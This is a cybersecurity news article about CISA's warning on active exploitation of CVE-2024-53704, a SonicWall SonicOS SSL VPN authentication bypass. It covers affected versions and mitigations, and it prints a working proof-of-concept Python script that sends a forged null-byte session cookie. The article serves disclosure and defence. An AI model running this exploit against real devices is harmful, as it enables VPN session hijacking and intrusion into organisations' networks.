Sunday, April 6, 2025
HomeCVE/vulnerabilityCISA Warns of Active Exploitation of SonicWall SonicOS RCE Vulnerability

CISA Warns of Active Exploitation of SonicWall SonicOS RCE Vulnerability

Published on

SIEM as a Service

Follow Us on Google News

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has issued an urgent alert regarding the active exploitation of critical remote code execution (RCE) vulnerability in SonicWall’s SonicOS, tracked as CVE-2024-53704.

Added to CISA’s Known Exploited Vulnerabilities (KEV) catalog on February 19, 2025, the flaw enables unauthenticated attackers to hijack SSL VPN sessions and bypass authentication mechanisms entirely.

Federal agencies have until March 11, 2025, to remediate the vulnerability under Binding Operational Directive (BOD) 22-01.

- Advertisement - Google News

Private-sector organizations, particularly in healthcare, finance, and critical infrastructure, are urged to prioritize patching due to the exploit’s low complexity and stealthy attack vector.

Technical Analysis of the Authentication Bypass

The vulnerability resides in SonicOS’s handling of SSL VPN session cookies via the getSslvpnSessionFromCookie function.

As per a report by Cyber Security News, Researchers at BishopFox discovered that the system improperly processes Base64-encoded cookies containing null bytes, allowing attackers to forge valid session identifiers.

By crafting a malicious payload of 32 null characters, encoded as a Base64 string and injected via the swap cookie, adversaries can hijack active VPN sessions without credentials.

A proof-of-concept Python script demonstrates the exploit’s simplicity:

import base64, requests, urllib3, warnings
warnings.filterwarnings("ignore", category=urllib3.exceptions.InsecureRequestWarning)
payload = base64.b64encode(b"\x00" * 32).decode()
resp = requests.get(
    "https://192.168.50.189:4433/cgi-bin/sslvpnclient?launchplatform=",
    cookies={"swap": payload},
    verify=False
)
print(resp.headers)
print(resp.text)

This script generates a malformed cookie that triggers the authentication bypass, granting attackers unrestricted access to VPN tunnels.

The flaw’s CVSSv3 score of 9.8 reflects its critical severity, compounded by the lack of required privileges and ease of exploitation.

Affected Products and Mitigation Strategies

CVE-2024-53704 impacts the following SonicOS versions:

  • SonicOS 7.1.x (versions prior to 7.1.1-7058)
  • SonicOS 7.1.2-7019
  • SonicOS 8.0.0-8035

SonicWall has released firmware updates for Gen5–Gen7 firewalls, urging immediate deployment. Organizations unable to patch immediately should implement these mitigations:

  1. Restrict SSL VPN access to trusted IP ranges via firewall rules.
  2. Disable internet-facing management interfaces to reduce exposure.
  3. Enforce multi-factor authentication (MFA) for all VPN users, eliminating reliance on single-factor credentials.

With over 500,000 global customers, including government agencies, SonicWall’s widespread adoption magnifies the vulnerability’s risk profile.

Federal agencies face mandatory remediation under CISA’s directive, but private-sector entities remain equally vulnerable.

The exploit’s ability to bypass authentication undetected complicates the incident response, as attackers gain persistent access without triggering traditional security alerts.

CISA’s warning underscores the escalating sophistication of attacks targeting network appliances.

As threat actors pivot from software to hardware vulnerabilities, proactive firmware management and layered authentication defenses are critical to mitigating modern cyber risks.

Free Webinar: Better SOC with Interactive Malware Sandbox for Incident Response, and Threat Hunting - Register Here

Divya
Divya
Divya is a Senior Journalist at GBhackers covering Cyber Attacks, Threats, Breaches, Vulnerabilities and other happenings in the cyber world.

Latest articles

Hack The box “Ghost” Challenge Cracked – A Detailed Technical Exploit

Cybersecurity researcher "0xdf" has cracked the "Ghost" challenge on Hack The Box (HTB), a...

Sec-Gemini v1 – Google’s New AI Model for Cybersecurity Threat Intelligence

Google has unveiled Sec-Gemini v1, an AI model designed to redefine cybersecurity operations by...

U.S. Secures Extradition of Rydox Cybercrime Marketplace Admins from Kosovo in Major International Operation

The United States has successfully extradited two Kosovo nationals, Ardit Kutleshi, 26, and Jetmir...

Ivanti Fully Patched Connect Secure RCE Vulnerability That Actively Exploited in the Wild

Ivanti has issued an urgent security advisory for CVE-2025-22457, a critical vulnerability impacting Ivanti...

Supply Chain Attack Prevention

Free Webinar - Supply Chain Attack Prevention

Recent attacks like Polyfill[.]io show how compromised third-party components become backdoors for hackers. PCI DSS 4.0’s Requirement 6.4.3 mandates stricter browser script controls, while Requirement 12.8 focuses on securing third-party providers.

Join Vivekanand Gopalan (VP of Products – Indusface) and Phani Deepak Akella (VP of Marketing – Indusface) as they break down these compliance requirements and share strategies to protect your applications from supply chain attacks.

Discussion points

Meeting PCI DSS 4.0 mandates.
Blocking malicious components and unauthorized JavaScript execution.
PIdentifying attack surfaces from third-party dependencies.
Preventing man-in-the-browser attacks with proactive monitoring.

More like this

Hack The box “Ghost” Challenge Cracked – A Detailed Technical Exploit

Cybersecurity researcher "0xdf" has cracked the "Ghost" challenge on Hack The Box (HTB), a...

Sec-Gemini v1 – Google’s New AI Model for Cybersecurity Threat Intelligence

Google has unveiled Sec-Gemini v1, an AI model designed to redefine cybersecurity operations by...

U.S. Secures Extradition of Rydox Cybercrime Marketplace Admins from Kosovo in Major International Operation

The United States has successfully extradited two Kosovo nationals, Ardit Kutleshi, 26, and Jetmir...